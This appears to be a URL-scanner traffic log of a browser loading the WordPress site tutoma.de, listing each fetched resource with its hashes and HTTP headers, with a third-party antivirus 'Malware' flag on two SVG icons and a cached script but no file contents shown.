142.250.74.74 200 OK 6.5 kB URL HTTP/2 ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js
IP 142.250.74.74:0
File type ASCII text, with very long lines (1190)
Hash c3bdf8c5d3c435f9a254e98df59a76d3
49de71ce7f439579b17b89d41630ecc42990f5f9
6ef91d15e35c54b958239444ffa14bcd4aa4d84f10ea10a5a3af71543b74ee85
GET /ajax/libs/webfont/1.5.18/webfont.js HTTP/1.1
Host: ajax.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 6490
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sun, 20 Nov 2022 12:31:38 GMT
expires: Mon, 20 Nov 2023 12:31:38 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
age: 294637
last-modified: Tue, 03 Mar 2020 19:15:00 GMT
content-type: text/javascript; charset=UTF-8
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/exp.png
87.98.235.184 200 OK 2.9 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/exp.png
IP 87.98.235.184:0
File type PNG image data, 81 x 90, 8-bit/color RGBA, non-interlaced\012- data
Hash a870281b3ad0669376a9e1534e79e8c1
9fa862e73ab5282166f7c2a96a943d5b05d844a2
f32eb5e44325396bc02efdda2fc7099a21db2a342a691e42d6fd5141094b0ec7
GET /wp-content/uploads/2018/09/exp.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2851
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:59 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon3.svg
87.98.235.184 200 OK 2.6 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon3.svg
IP 87.98.235.184:0
File type SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (5112)
Hash 0abe85d5f957237ec9d62cf118a7f836
3232927359ebfdc870f18b84cf7677e8bc7e447b
c83c771bb9c1460ad468307c1049efd4758cfcbd24c80425c008ae930d79ccea
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/09/icon3.svg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/svg+xml
content-length: 2613
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
accept-ranges: none
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon1.svg
87.98.235.184 200 OK 3.5 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon1.svg
IP 87.98.235.184:0
File type SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (6340)
Hash d0ca659ecc28344aa1d0bc75a31e80e8
b5ec9c4c19dbb8d7a64ff7a357f7b950e473a8b5
ac8b984c05a32aad1069e9a53a65fd49f35a111c5db9fff5447a754dca097999
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/09/icon1.svg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/svg+xml
content-length: 3542
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
accept-ranges: none
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js
87.98.235.184 200 OK 56 kB URL HTTP/2 tutoma.de/wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js
IP 87.98.235.184:0
File type ASCII text, with very long lines (9959)
Hash e54279170c5aa1e09b0a91ef047f42dc
ec65cba2b554bd8adefa371a23ef04bf8ae21764
a198d201ff0a6a448fa0b2f4dfb3908fbc9661fb4331a04694433b5add414b0c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/x-javascript
content-length: 55866
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Mon, 11 Nov 2019 17:12:34 GMT
accept-ranges: none
cache-control: max-age=31536000, public, immutable
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/shape1.png
87.98.235.184 200 OK 6.1 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/shape1.png
IP 87.98.235.184:0
File type PNG image data, 213 x 343, 8-bit/color RGBA, non-interlaced\012- data
Hash 65557582360cbfa51f0971824d046097
e747df5f4b8e12f3271423ec27b54e77e73fd8d9
102dca97c9bcee8c623d81173603191b2a56ceaace22ab08c15c59041f1b9c45
GET /wp-content/themes/tutoma/dist/images/shape1.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 6092
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:27 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.googletagmanager.com/gtag/js?id=UA-128197015-1
142.250.74.168 200 OK 44 kB URL HTTP/2 www.googletagmanager.com/gtag/js?id=UA-128197015-1
IP 142.250.74.168:0
File type ASCII text, with very long lines (1921)
Hash 0e7717911c7740993d76cb7278bdaff7
6e184287c96eeb637cdc0909ceb5deea00b4b796
c96de71f67c5516771b747f8c4c13254034871fb26faacaced8af6a09b9c4952
GET /gtag/js?id=UA-128197015-1 HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Wed, 23 Nov 2022 22:22:15 GMT
expires: Wed, 23 Nov 2022 22:22:15 GMT
cache-control: private, max-age=900
last-modified: Wed, 23 Nov 2022 21:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 43614
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg
87.98.235.184 200 OK 18 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg
IP 87.98.235.184:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1210x885, components 3\012- data
Hash d8d90148c413ad504b1ecebce6d5143f
5196a3829f4dd9209e86e06f1f525f49de3f5f21
e3e43f43dfee246c139b64401161f0f6b9c14e6bcdd44a682f924544b77e964b
GET /wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 17630
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.googletagmanager.com/gtm.js?id=GTM-W2LD69R
142.250.74.168 200 OK 49 kB URL HTTP/2 www.googletagmanager.com/gtm.js?id=GTM-W2LD69R
IP 142.250.74.168:0
File type ASCII text, with very long lines (5763)
Hash 06d77327a3ab58c0125c4201f553f40c
19585bdc1fe36506f964b6e9ac1309f04b0c77dd
da354569083efe0782beda3345975e961007a67dd380066d1161de82c6936375
GET /gtm.js?id=GTM-W2LD69R HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Wed, 23 Nov 2022 22:22:15 GMT
expires: Wed, 23 Nov 2022 22:22:15 GMT
cache-control: private, max-age=900
last-modified: Wed, 23 Nov 2022 21:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 48652
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/shape5.png
87.98.235.184 200 OK 12 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/shape5.png
IP 87.98.235.184:0
File type PNG image data, 450 x 678, 8-bit/color RGBA, non-interlaced\012- data
Hash 32cb342c8db440275385e697f33b120b
6242a10692bbc4eeb9aa931dedc44661f866dc77
189464fb130a178d6c73dfec6c0455f55b0d1ccdda57911088e539a09c4340e8
GET /wp-content/themes/tutoma/dist/images/shape5.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 12222
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:27 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2019/01/seo-workshop.jpg
87.98.235.184 200 OK 59 kB URL HTTP/2 tutoma.de/wp-content/uploads/2019/01/seo-workshop.jpg
IP 87.98.235.184:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 920x552, components 3\012- data
Hash d152e65ebb91943a3c4602ffa67656de
4ad36781b76af1311ee4dfff298f14cd9443acb5
3c2dbb4b9d9d5c0f7d3e789cf30bdb262cba23a6a5fd9310b75213adc671f2ef
GET /wp-content/uploads/2019/01/seo-workshop.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 58843
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Tue, 12 Mar 2019 16:51:45 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 065495ec7a963a205abd9c8dbc75cb5d
ea416d0df4f6706150bda5da2077174f5cdd986b
1b2a2afee887651b23a849f14ace89b330329f6bf61c331545a3f6d12037aee5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash fb4ee3082622f9f3340432290d63437e
852ca64934462e133e34043fca561aca215e6255
d4c2f665873baede94309128e276df6fdf7f0e1ec15699e75cd6bae2c24d556a
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/plugins/contact-form-7/images/ajax-loader.gif
87.98.235.184 200 OK 847 B URL HTTP/2 tutoma.de/wp-content/plugins/contact-form-7/images/ajax-loader.gif
IP 87.98.235.184:0
File type GIF image data, version 89a, 16 x 16\012- data
Hash af962b37779a443a77ab836b3b7a93f5
cad7feb11183c71b87470e11e022b16ecdcc7ac9
65b72e15d975f67fbd1cb126d57772c06c21fa016e5651b6ce213b26ce0e6877
GET /wp-content/plugins/contact-form-7/images/ajax-loader.gif HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/gif
content-length: 847
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Fri, 06 Sep 2019 17:14:39 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
push.services.mozilla.com/
35.166.172.24 101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 35.166.172.24:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: MpSuhbCViXGqwRUa5B5fEQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: LF9kFFR4/KjySzNdo1/D8OdzxXI=
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
216.58.207.195 200 OK 31 kB URL HTTP/2 fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Hash ac0d2859ea5f8fd6bcb3c305c08ec184
7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 17 Nov 2022 16:40:18 GMT
expires: Fri, 17 Nov 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 538918
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/uploads/2018/10/favicon.png
87.98.235.184 200 OK 858 B URL HTTP/2 tutoma.de/wp-content/uploads/2018/10/favicon.png
IP 87.98.235.184:0
File type PNG image data, 43 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 0d18c22d6879b6dc11090f075043cfab
1f50ed03b08b3acca083ae4d485b9166a4956f7c
eb457b7e68372bef8190d7be135f9ccd0228782cd44329720d07b3a62e39e144
GET /wp-content/uploads/2018/10/favicon.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: image/png
content-length: 858
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:45 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:16 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.google-analytics.com/analytics.js
142.250.74.174 200 OK 20 kB URL HTTP/2 www.google-analytics.com/analytics.js
IP 142.250.74.174:0
File type ASCII text, with very long lines (1325)
Hash 47e6f374ca946fddd5b59871b325736c
baa9282efc8785e84d247c3bff518eaa45f101c4
16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
strict-transport-security: max-age=10886400; includeSubDomains; preload
x-content-type-options: nosniff
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 20039
date: Wed, 23 Nov 2022 20:41:08 GMT
expires: Wed, 23 Nov 2022 22:41:08 GMT
cache-control: public, max-age=7200
age: 6068
last-modified: Tue, 27 Sep 2022 22:01:05 GMT
content-type: text/javascript
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.digicert.com/
